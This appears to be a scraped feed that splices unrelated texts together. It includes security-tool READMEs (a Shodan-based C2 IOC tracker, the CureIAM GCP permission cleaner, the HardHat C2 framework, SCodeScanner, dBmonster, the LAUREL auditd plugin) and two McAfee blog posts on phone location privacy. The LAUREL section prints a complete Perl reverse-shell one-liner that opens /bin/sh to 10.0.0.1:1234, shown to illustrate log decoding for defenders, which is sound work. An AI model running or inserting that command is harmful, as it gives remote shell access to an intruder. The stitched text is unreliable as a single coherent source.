Free to use IOC feed for various tools/malware. It started out for just C2 tools but has morphed into tracking infostealers and botnets as well. It uses shodan.io/">Shodan searches to collect the IPs. The most recent collection is always stored in data
; the IPs are broken down by tool and there is an all.txt
.
The feed should update daily. Actively working on making the backend more reliable
Many of the Shodan queries have been sourced from other CTI researchers:
Huge shoutout to them!
Thanks to BertJanCyber for creating the KQL query for ingesting this feed
And finally, thanks to Y_nexro for creating C2Live in order to visualize the data
If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY
echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
bash
python3 -m pip install -r requirements.txt
python3 tracker.py
I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted, just know, fidelity is paramount (high true/false positive ratio is the focus).
CureIAM is an easy-to-use, reliable, and performant engine for Least Privilege Principle Enforcement on GCP cloud infra. It enables DevOps and Security team to quickly clean up accounts in GCP infra that have granted permissions of more than what are required. CureIAM fetches the recommendations and insights from GCP IAM recommender, scores them and enforce those recommendations automatically on daily basic. It takes care of scheduling and all other aspects of running these enforcement jobs at scale. It is built on top of GCP IAM recommender APIs and Cloudmarker framework.
Discover what makes CureIAM scalable and production grade.
safe_to_apply_score
, risk_score
, over_privilege_score
. Each score serves a different purpose. For safe_to_apply_score
identifies the capability to apply recommendation on automated basis, based on the threshold set in CureIAM.yaml
config file.Since CureIAM is built with python, you can run it locally with these commands. Before running make sure to have a configuration file ready in either of /etc/CureIAM.yaml
, ~/.CureIAM.yaml
, ~/CureIAM.yaml
, or CureIAM.yaml
and there is Service account JSON file present in current directory with name preferably cureiamSA.json
. This SA private key can be named anything, but for docker image build, it is preferred to use this name. Make you to reference this file in config for GCP cloud.
# Install necessary dependencies
$ pip install -r requirements.txt
# Run CureIAM now
$ python -m CureIAM -n
# Run CureIAM process as schedular
$ python -m CureIAM
# Check CureIAM help
$ python -m CureIAM --help
CureIAM can be also run inside a docker environment, this is completely optional and can be used for CI/CD with K8s cluster deployment.
# Build docker image from dockerfile
$ docker build -t cureiam .
# Run the image, as schedular
$ docker run -d cureiam
# Run the image now
$ docker run -f cureiam -m cureiam -n
CureIAM.yaml
configuration file is the heart of CureIAM engine. Everything that engine does it does it based on the pipeline configured in this config file. Let's break this down in different sections to make this config look simpler.
logger:
version: 1
disable_existing_loggers: false
formatters:
verysimple:
format: >-
[%(process)s]
%(name)s:%(lineno)d - %(message)s
datefmt: "%Y-%m-%d %H:%M:%S"
handlers:
rich_console:
class: rich.logging.RichHandler
formatter: verysimple
file:
class: logging.handlers.TimedRotatingFileHandler
formatter: simple
filename: /tmp/CureIAM.log
when: midnight
encoding: utf8
backupCount: 5
loggers:
adal-python:
level: INFO
root:
level: INFO
handlers:
- rich_console
- file
schedule: "16:00"
This subsection of config uses, Rich
logging module and schedules CureIAM to run daily at 16:00
.
plugins
section in CureIAM.yaml
. You can think of this section as declaration for different plugins. plugins:
gcpCloud:
plugin: CureIAM.plugins.gcp.gcpcloud.GCPCloudIAMRecommendations
params:
key_file_path: cureiamSA.json
filestore:
plugin: CureIAM.plugins.files.filestore.FileStore
gcpIamProcessor:
plugin: CureIAM.plugins.gcp.gcpcloudiam.GCPIAMRecommendationProcessor
params:
mode_scan: true
mode_enforce: true
enforcer:
key_file_path: cureiamSA.json
allowlist_projects:
- alpha
blocklist_projects:
- beta
blocklist_accounts:
- foo@bar.com
allowlist_account_types:
- user
- group
- serviceAccount
blocklist_account_types:
- None
min_safe_to_apply_score_user: 0
min_safe_to_apply_scor e_group: 0
min_safe_to_apply_score_SA: 50
esstore:
plugin: CureIAM.plugins.elastic.esstore.EsStore
params:
# Change http to https later if your elastic are using https
scheme: http
host: es-host.com
port: 9200
index: cureiam-stg
username: security
password: securepassword
Each of these plugins declaration has to be of this form:
plugins:
<plugin-name>:
plugin: <class-name-as-python-path>
params:
param1: val1
param2: val2
For example, for plugins CureIAM.stores.esstore.EsStore
which is this file and class EsStore
. All the params which are defined in yaml has to match the declaration in __init__()
function of the same plugin class.
audits:
IAMAudit:
clouds:
- gcpCloud
processors:
- gcpIamProcessor
stores:
- filestore
- esstore
Multiple Audits can be created out of this. The one created here is named IAMAudit
with three plugins in use, gcpCloud
, gcpIamProcessor
, filestores
and esstore
. Note these are the same plugin names defined in Step 2. Again this is like defining the pipeline, not actually running it. It will be considered for running with definition in next step.
CureIAM
to run the Audits defined in previous step. run:
- IAMAudits
And this makes the entire configuration for CureIAM, you can find the full sample here, this config driven pipeline concept is inherited from Cloudmarker framework.
The JSON which is indexed in elasticsearch using Elasticsearch store plugin, can be used to generate dashboard in Kibana.
[Please do!] We are looking for any kind of contribution to improve CureIAM's core funtionality and documentation. When in doubt, make a PR!
Gojek Product Security Team
<>
=============
Adding the version in library to avoid any back compatibility issues.
Running docker compose: docker-compose -f docker_compose_es.yaml up
mode_scan: true
mode_enforce: false
HardHat is a multiplayer C# .NET-based command and control framework. Designed to aid in red team engagements and penetration testing. HardHat aims to improve the quality of life factors during engagements by providing an easy-to-use but still robust C2 framework.
It contains three primary components, an ASP.NET teamserver, a blazor .NET client, and C# based implants.
Alpha Release - 3/29/23 NOTE: HardHat is in Alpha release; it will have bugs, missing features, and unexpected things will happen. Thank you for trying it, and please report back any issues or missing features so they can be addressed.
Discord Join the community to talk about HardHat C2, Programming, Red teaming and general cyber security things The discord community is also a great way to request help, submit new features, stay up to date on the latest additions, and submit bugs.
documentation can be found at docs
To configure the team server's starting address (where clients will connect), edit the HardHatC2\TeamServer\Properties\LaunchSettings.json changing the "applicationUrl": "https://127.0.0.1:5000" to the desired location and port. start the teamserver with dotnet run from its top-level folder ../HrdHatC2/Teamserver/
Code contributions are welcome feel free to submit feature requests, pull requests or send me your ideas on discord.
Do you remember the days of printing out directions from your desktop? Or the times when passengers were navigation co-pilots armed with a 10-pound book of maps? You can thank location services on your smartphone for today’s hassle-free and paperless way of getting around town and exploring exciting new places.
However, location services can prove a hassle to your online privacy when you enable location sharing. Location sharing is a feature on many connected devices – smartphones, tablets, digital cameras, smart fitness watches – that pinpoints your exact location and then distributes your coordinates to online advertisers, your social media following, or strangers.
While there are certain scenarios where sharing your location is a safety measure, in most cases, it’s an online safety hazard. Here’s what you should know about location sharing and the effects it has on your privacy.
Location sharing is most beneficial when you’re unsure about new surroundings and want to let your loved ones know that you’re ok. For example, if you’re traveling by yourself, it may be a good idea to share the location of your smartphone with an emergency contact. That way, if circumstances cause you to deviate from your itinerary, your designated loved one can reach out and ensure your personal safety.
The key to sharing your location safely is to only allow your most trusted loved one to track the whereabouts of you and your connected device. Once you’re back on known territory, you may want to consider turning off all location services, since it presents a few security and privacy risks.
In just about every other case, you should definitely think twice about enabling location sharing on your smartphone. Here are three risks it poses to your online privacy and possibly your real-life personal safety:
Does it sometimes seem like your phone, tablet, or laptop is listening to your conversations? Are the ads you get in your social media feeds or during ad breaks in your gaming apps a little too accurate? When ad tracking is enabled on your phone, it allows online advertisers to collect your personal data that you add to your various online accounts to better predict what ads you might like. Personal details may include your full name, birthday, address, income, and, thanks to location tracking, your hometown and regular neighborhood haunts.
If advertisers kept these details to themselves, it may just seem like a creepy invasion of privacy; however, data brokerage sites may sell your personally identifiable information (PII) to anyone, including cybercriminals. The average person has their PII for sale on more than 30 sites and 98% of people never gave their permission to have their information sold online. Yet, data brokerage sites are legal.
One way to keep your data out of the hands of advertisers and cybercriminals is to limit the amount of data you share online and to regularly erase your data from brokerage sites. First, turn off location services and disable ad tracking on all your apps. Then, consider signing up for McAfee Personal Data Cleanup, which scans, removes, and monitors data brokerage sites for your personal details, thus better preserving your online privacy.
Location sharing may present a threat to your personal safety. Stalkers could be someone you know or a stranger. Fitness watches that connect to apps that share your outdoor exercising routes could be especially risky, since over time you’re likely to reveal patterns of the times and locations where one could expect to run into you.
Additionally, stalkers may find you through your geotagged social media posts. Geotagging is a social media feature that adds the location to your posts. Live updates, like live tweeting or real-time Instagram stories, can pinpoint your location accurately and thus alert someone on where to find you.
Social engineering is an online scheme where cybercriminals learn all there is about you from your social media accounts and then use that information to impersonate you or to tailor a scam to your interests. Geotagged photos and posts can tell a scammer a lot about you: your hometown, your school or workplace, your favorite café, etc.
With these details, a social engineer could fabricate a fundraiser for your town, for example. Social engineers are notorious for evoking strong emotions in their pleas for funds, so beware of any direct messages you receive that make you feel very angry or very sad. With the help of ChatGPT, social engineering schemes are likely going to sound more believable than ever before. Slow down and conduct your own research before divulging any personal or payment details to anyone you’ve never met in person.
Overall, it’s best to live online as anonymously as possible, which includes turning off your location services when you feel safe in your surroundings. McAfee+ offers several features to improve your online privacy, such as a VPN, Personal Data Cleanup, and Online Account Cleanup.
The post 3 Reasons to Think Twice About Enabling Location Sharing appeared first on McAfee Blog.
We all know that our phones know a lot about us. And they most certainly know a lot about where we go, thanks to the several ways they can track our location.
Location tracking on your phone offers plenty of benefits, such as with apps that can recommend a good restaurant nearby, serve up the weather report for your exact location, or connect you with singles for dating in your area. Yet the apps that use location tracking may do more with your location data than that. They may collect it, and in turn sell it to advertisers and potentially other third parties that have an interest in where you go and what you do.
Likewise, cell phone providers have other means of collecting location information from your phone, which they may use for advertising and other purposes as well.
If that sounds like more than you’re willing to share, know that you can do several things that can limit location tracking on your phone—and thus limit the information that can potentially end up in other people’s hands.
As we look at the ways you can limit location tracking on your phone, it helps to know the basics of how smartphones can track your movements.
For starters, outside of shutting down your phone completely, your phone can be used to determine your location to varying degrees of accuracy depending on the method used:
Now here’s what makes these tracking methods so powerful: in addition to the way they can determine your phone’s location, they’re also quite good at determining your identity too. With it, companies know who you are, where you are, and potentially some idea of what you’re doing there based on your phone’s activity.
Throughout our blogs we refer to someone’s identity as a jigsaw puzzle. Some pieces are larger than others, like your Social Security number or tax ID number being among the biggest because they are so unique. Yet if someone gathers enough of those smaller pieces, they can put those pieces together and identify you.
Things like your phone’s MAC address, ad IDs, IP address, device profile, and other identifiers are examples of those smaller pieces, all of which can get collected. In the hands of the collector, they can potentially create a picture of who you are and where you’ve been.
What happens to your data largely depends on what you’ve agreed to.
In terms of apps, we’ve all seen the lengthy user agreements that we click on during the app installation process. Buried within them are terms put forth by the app developer that cover what data the app collects, how it’s used, and if it may be shared with or sold to third parties. Also, during the installation process, the app may ask for permissions to access certain things on your phone, like photos, your camera, and yes, location services so it can track you. When you click “I Agree,” you indeed agree to all those terms and permissions.
Needless to say, some apps only use and collect the bare minimum of information as part of the agreement. On the other end of the spectrum, some apps will take all they can get and then sell the information they collect to third parties, such as data brokers that build exacting profiles of individuals, their histories, their interests, and their habits.
In turn, those data brokers will sell that information to anyone, which can be used by advertisers along with identity thieves, scammers, and spammers. And as reported in recent years, various law enforcement agencies will purchase that information as well for surveillance purposes.
Further, some apps are malicious from the start. Google Play does its part to keep its virtual shelves free of malware-laden apps with a thorough submission process as reported by Google and through its App Defense Alliance that shares intelligence across a network of partners, of which we’re a proud member. Android users also have the option of running Play Protect to check apps for safety before they’re downloaded. Apple has its own rigorous submission process for weeding out fraud and malicious apps in its store as well.
Yet, bad actors find ways to sneak malware into app stores. Sometimes they upload an app that’s initially clean and then push the malware to users as part of an update. Other times, they’ll embed the malicious code so that it only triggers once it’s run in certain countries. They will also encrypt malicious code in the app that they submit, which can make it difficult for reviewers to sniff out. These apps will often steal data, and are designed to do so, including location information in some cases.
As far as cell phone service providers go, they have legitimate reasons for tracking your phone in the ways mentioned above. One is for providing connectivity to emergency service calls (again, like 911 in the U.S.), yet others are for troubleshooting and to ensure that only legitimate customers are accessing their network. And, depending on the carrier, they may use it for advertising purposes in programs that you may willingly opt into or that you must intentionally opt out of.
We each have our own comfort level when it comes to our privacy. For some, personalized ads have a certain appeal. For others, not so much, not when it involves sharing information about themselves. Yet arguably, some issues of privacy aren’t up for discussion, like ending up with a malicious data-stealing app on your phone.
In all, you can take several steps to limit tracking on your smartphone to various degrees—and boost your privacy to various degrees as a result:
There’s no way around it. Using a smartphone puts you on the map. And to some extent, what you’re doing there as well. Outside of shutting down your phone or popping into Airplane Mode (noting what we said about iPhones and their “Find My Network” functionality above), you have no way of preventing location tracking. You can most certainly limit it.
For yet more ways you can lock down your privacy and your security on your phone, online protection software can help. Our McAfee+ plans protect you against identity theft, online scams, and other mobile threats—including credit card and bank fraud, emerging viruses, malicious texts and QR codes. For anyone who spends a good portion of their day on their phone, this kind of protection can make life far safer given all the things they do and keep on there.
The post How to Limit Location Tracking on Your Phone appeared first on McAfee Blog.
SCodeScanner stands for Source Code scanner where the user can scans the source code for finding the Critical Vulnerabilities. The main objective for this scanner is to find the vulnerabilities inside the source code before code gets published in Prod.
SCodeScanner received 5 CVEs for finding vulnerabilities in multiple CMS plugins.
pip3 install -r requirements.txt
python3 scscanner.py --help
I would love to hear your feedback on this tool. Open issues if you found any. And open PR request if you have something.
With dBmonster you are able to scan for nearby WiFi devices and track them trough the signal strength (dBm) of their sent packets (sniffed with TShark). These dBm values will be plotted to a graph with matplotlib. It can help you to identify the exact location of nearby WiFi devices (use a directional WiFi antenna for the best results) or to find out how your self made antenna works the best (antenna radiation patterns).
Feature | Linux | MacOS |
---|---|---|
Listing WiFi interfaces | ✅ | ✅ |
Track & scan on 2.4GHz | ✅ | ✅ |
Track & scan on 5GHz | ✅ | ✅ |
Scanning for AP | ✅ | ✅ |
Scanning for STA | ✅ | |
Beep when device found | ❓ | ✅ |
git clone https://github.com/90N45-d3v/dBmonster
cd dBmonster
# Install required tools (On MacOS without sudo)
sudo python requirements.py
# Start dBmonster
sudo python dBmonster.py
Platform
| WiFi Adapter
|
---|---|
Kali Linux | ALFA AWUS036NHA, DIY Bi-Quad WiFi Antenna |
MacOS Monterey | Internal card 802.11 a/b/g/n/ac (MBP 2019) |
Normally, you can only enable monitor-mode on the internal wifi card from MacOS with the airport utility from Apple. Somehow, wireshark (or here TShark) can enable it too on MacOS. Cool, but because of the MacOS system and Wireshark’s workaround, there are many issues running dBmonster on MacOS. After some time, it could freeze and/or you have to stop dBmonster/Tshark manually from the CLI with the ps
command. If you want to run it anyway, here are some helpful tips:
Look if there are any processes, named dBmonster, tshark or python:
sudo ps -U root
Now kill them with the following command:
sudo kill <PID OF PROCESS>
sudo airport <WiFi INTERFACE NAME> sniff
Press control + c after a few seconds
LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.
TLDR: Instead of audit events that look like this…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
This happens at the source. The generated event even contains useful information about the spawning process:
"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH
and EXECVE
elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.
LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).
Refer to JSON-based log format for a description of the log format.
We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.
A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event record are not suppressed, so rules like
-a always,exclude -F msgtype=EOE
should be removed.
Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, id
points to the message corresponding to the last execve
syscall for this process:
"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}
Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as keys to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis to filter out harmless events.
Consider the following rule that set keys for apt and dpkg invocations:
-w /usr/bin/apt-get -p x -k software_mgmt
Let's configure LAUREL to turn the software_mgmt
key into a process label that is propagated to child processes:
apt-get
and its subprocesses to be labelled software_mgmt
. For example, running sudo apt-get update
on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_gmt
can be observed in LAUREL's audit log:
apt-get update
/usr/bin/dpkg --print-foreign-architectures
/usr/lib/apt/methods/http
/usr/lib/apt/methods/https
/usr/lib/apt/methods/https
/usr/lib/apt/methods/http
/usr/lib/apt/methods/gpgv
/usr/lib/apt/methods/gpgv
/usr/bin/dpkg --print-foreign-architectures
/usr/bin/dpkg --print-foreign-architectures
This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.
See INSTALL.md.
GNU General Public License, version 3
The logo was created by Birgit Meyer <hello@biggi.io>.